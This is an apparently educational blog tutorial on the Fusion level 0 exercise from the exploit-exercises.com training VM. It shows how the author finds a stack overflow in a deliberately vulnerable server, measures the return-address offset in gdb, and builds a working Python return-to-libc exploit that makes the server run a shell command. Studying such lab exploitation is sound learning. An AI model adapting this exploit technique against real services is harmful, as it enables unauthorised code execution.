Hey guys, In this series of articles I will try to teach how to research and exploit bugs in programs. I will try to show how I think and work as opposed to just showing the solution. Just like my math teacher used to say “Show the work”. I believe that it is more educational this way. And there is actually a chance you will learn something. If you just want to see the solution, feel free to skip to the summary at the end or read the code in my github. I will assume that you are a competent high-level programmer. That can code complex programs in C. If that is not the case, I believe it will be more beneficial to you to learn how to code in C and Python first. We will be doing the fusion VM from exploit-exercises.com. Today we will be doing Fusion 0.
- Get a working server and client..
- Find a vulnerability (In this case buffer overflow as hinted in this stage’s page)
- Change the return address to be that of the function system.
- Change the parameters the function system is getting so that we run whatever we want
First thing I did was to setup the host machine with the VM I downloaded from exploit-excrecises website. I made sure I can ssh into it and that it works.
Let’s understand what we are dealing with, we are given a web server running on tcp port 2000 on a vm we downloaded from the internet. Our goal is to find and exploit a bug in the server that will allow us to run arbitrary code on the server.
The first thing we do is to read the source code. If you don’t understand c good enough to explain the code, you are not ready to learn exploitation yet, your time will be better spent finding a good c programming course online and starting with it. I highly encourage that.
Understanding the program:
So we read the program and we understand the following:
- The program is a server that binds a port.
- Forks for each new connection.
- Every fork then reads from stdin some input, validates it and basically prints some strings.
It only makes sense if we assume that the received connection will be used as stdin and stdout for the connection, otherwise who will write the input for this server?
Anyway we want to test this assumption so we write a short python script to connect to the server and communicate with it. We play with it and in a few iterations we get to this:
#! /usr/bin/env python import socket PORT = 20000 HOST = "VM" def get_commands(): return ["GET /etc/hosts HTTP/1.1 "] def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) commands = get_commands() for c in commands: print "Sending:\"%s\"" % (c, ) s.send(c, len(c)) print "Reciving:\"%s\"" % (s.recv(1000), ) print "Reciving:\"%s\"" % (s.recv(1000), ) if __name__ == "__main__": main()
We run it:
Sending:"GET /etc/hosts HTTP/1.1 " Reciving:"[debug] buffer is at 0xbf879c48 :-) " Reciving:"trying to access /etc/hosts "
So basically we have a working client to communicate with the server.
Now lets try to look for the vulnerabilities.
The simplest family of vulnerabilities I know is stack overflow. Which happens when a program tries to write data to variable that is stored on the stack past variable length.
The easiest way to find them is to search for arrays of data being defined on the stack. In this program we see 2 arrays on the stack.
- Char resolved; (at fix_path)
- Char buffer; (at parse_http_request)
To count either of those as a stack overflow, we need find an input that causes more data than the size of the variable to be copied into the variable. In this case at least 129 or 1025 bytes.
So, we teak the function get_commands to try to overflow the buffer named buffer, we run the script… and …. Nothing happens. Or at least we don’t see anything different.
New get_commands function:
def get_commands(): pattern = "GET /etc/hosts HTTP/1.1 " padding_length = 1024 - len(pattern) padding = "a" * padding_length return [pattern + padding + "abcdefgh"]
This function returns a list with one string. Let’s understand it. The first thing in string is what I called pattern, it is just what I had to return in order to confirm to the protocol of the server. The next thing is the padding, the padding is a long string of a’s that we use to fill up the buffer up to the location where we think the overflow will happen. Why do we use ‘a’s? it’s to make our debugging of what happens later easier.
You are probably wondering this “abcdefgh”. Well obviously these are the first 8 letters of the English alphabet :D. Why do we need them you might ask yourself? The answer is that if we would overflow any variable it would be pretty easy to spot it if we overflow it with a known values.
What do we do next?
- Use a debugger to get a better understanding of what happened
- Try to work on the other potential buffer overflow.
I know what happened, but for now I prefer option number 2. Don’t worry, we will have plenty of opportunities to use debuggers in this series of articles.
So let’s try to work on the potential buffer overflow at fix_path, to do that, we need to pass a path which is larger than 128 bytes. After some trial and error we get to this:
def get_commands(): file_path = "/" pattern = "GET %s%s HTTP/1.1 " padding_length = 160 padding = "a" * padding_length + "bbbb" return [pattern % (file_path, padding)]
And the output is this:
Sending:"GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa Reciving:"[debug] buffer is at 0xbf879c48 :-) " Traceback (most recent call last): File "fusion0-overflow2.py", line 25, in <module> main() File "fusion0-overflow2.py", line 22, in main print "Reciving:\"%s\"" % (s.recv(1000), ) socket.error: [Errno 104] Connection reset by peer
We can see that the server has stopped responding to us. It happened because we managed to overflow the buffer “char resolved”. Somewhere after this buffer, the return address of the function fix_path was saved. We overflowed it with ‘a’s and ‘b’s and caused the function to return into an memory address which is not mapped.
We use a debugger to make sure we are right on that guess.
Program received signal SIGSEGV, Segmentation fault. [Switching to process 22996] 0x61616161 in ?? ()
Well we were right.. We stopped at the address 0x61616161 which means that the memory address containing the return address fix_path was overrun with 4 ‘a’s
Now we want to figure out just how many a’s do we need to use until the return address of fix_path. We can guess and brute force it until we find out. But I will just use a debugger.
If you don’t understand what I did there I suggest reading my gdb cheatsheet (Coming soon).
(gdb) b * fix_path Breakpoint 4 at 0x8049815: file level00/level00.c, line 4. (gdb) c Continuing. <run the client script> (gdb) x/10wx resolved+128 0xbf879c20: 0xbf879c4c 0xb7826918 0x00000000 0x08049970 0xbf879c30: 0xbf879c4c 0x00000020 0x00000004 0x00000000 0xbf879c40: 0x001761e4 0xbf879cd0 (gdb) x/i 0x08049970 0x8049970 <parse_http_request+283>: mov eax,0x8049f17
The address 12 bytes (remember that every address is 4 bytes long) after the buffer seems like an address of code segment (It starts with 0x8049 just like the address of fix_path) we test it, and it is an address in the function that called fix_path. So we know that we need to use 140 bytes of file path and after it comes the return address to our function.
We test it by changing padding length from the previous code, and this time we get a crash at 0x62626262 (same as 4 ‘b’s).
After we overflow the buffer, this is how we would like the stack to look like:
Take as much time as you need to understand this, This is the most important thing in this whole post. This might help you:
And remember that X is where the return address of the function is being saved. and X – 139 is the address of the buffer we control.
While being connected with a debugger to our target program:
(gdb) x/i *system 0xb76bab20 <__libc_system>: sub esp,0x10
Why do we need exit? After the function system will finish doing its thing, we prefer the program to exit in a regular way and not crashing in a weird way.
def get_commands(): file_path = "/" pattern = "GET %s%s%s HTTP/1.1 " padding_length = 139 padding = "a" * padding_length ADDRESS_OF_SYSTEM = 0xb76bab20 ADDRESS_OF_EXIT = 0xb76b09e0 ADDERSS_OF_BASH_LINE = 0x13371338 payload = struct.pack("I", ADDRESS_OF_SYSTEM ) + struct.pack("I", ADDRESS_OF_EXIT) + struct.pack("I", ADDERSS_OF_BASH_LINE) return [pattern % (file_path, padding, payload)]
We run the new script while being connected in a debugger, and We understand that we get the invalid protocol error. After re-reading the source I understand the problem. The function system has 0x20 at the address which is ‘ ’ (space). The problem is that space is part of our protocol. And we can’t use it as part of the payload.
After thinking about it a little bit, I run the following line in gdb:
(gdb) x/2i system-1 0xb76bab1f: nop 0xb76bab20 <__libc_system>: sub esp,0x10
Seems like I can just use the address of a one opcode before system in order to avoid using 0x20 in the address. So I do it.. This time it works and with a debugger I find out that I stopped inside the function system!
Breakpoint 3, __libc_system (line=0x13371338 <Address 0x13371338 out of bounds>) at ../sysdeps/posix/system.c:179 179 ../sysdeps/posix/system.c: No such file or directory. in ../sysdeps/posix/system.c
See this 0x13371338, its the same as ADDERSS_OF_BASH_LINE, which means that we know how to pass the right parameter. find the address of the buffer with a debugger and replace this placeholder number with the right number. we run the program again and it works. We verify by running ls on /tmp.
Final version of the code:
#! /usr/bin/env python import socket import struct PORT = 20000 HOST = "VM" def get_commands(): file_path = "/" pattern = "GET %s%s%s HTTP/1.1 " padding_length = 139 padding = "a" * padding_length ADDRESS_OF_SYSTEM = 0xb76bab1f ADDRESS_OF_EXIT = 0xb76b09e0 ADDERSS_OF_BASH_LINE = 0xbf879cee BASH_LINE = "touch /tmp/a; " payload = struct.pack("I", ADDRESS_OF_SYSTEM ) + struct.pack("I", ADDRESS_OF_EXIT) + struct.pack("I", ADDERSS_OF_BASH_LINE) return [pattern % (file_path, padding, payload) + BASH_LINE] def main(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) commands = get_commands() for c in commands: print "Sending:\"%s\"" % (c, ) s.send(c, len(c)) print "Reciving:\"%s\"" % (s.recv(1000), ) print "Reciving:\"%s\"" % (s.recv(1000), ) if __name__ == "__main__": main()
If you have any questions or feedback I would love to hear from you in the comments below 🙂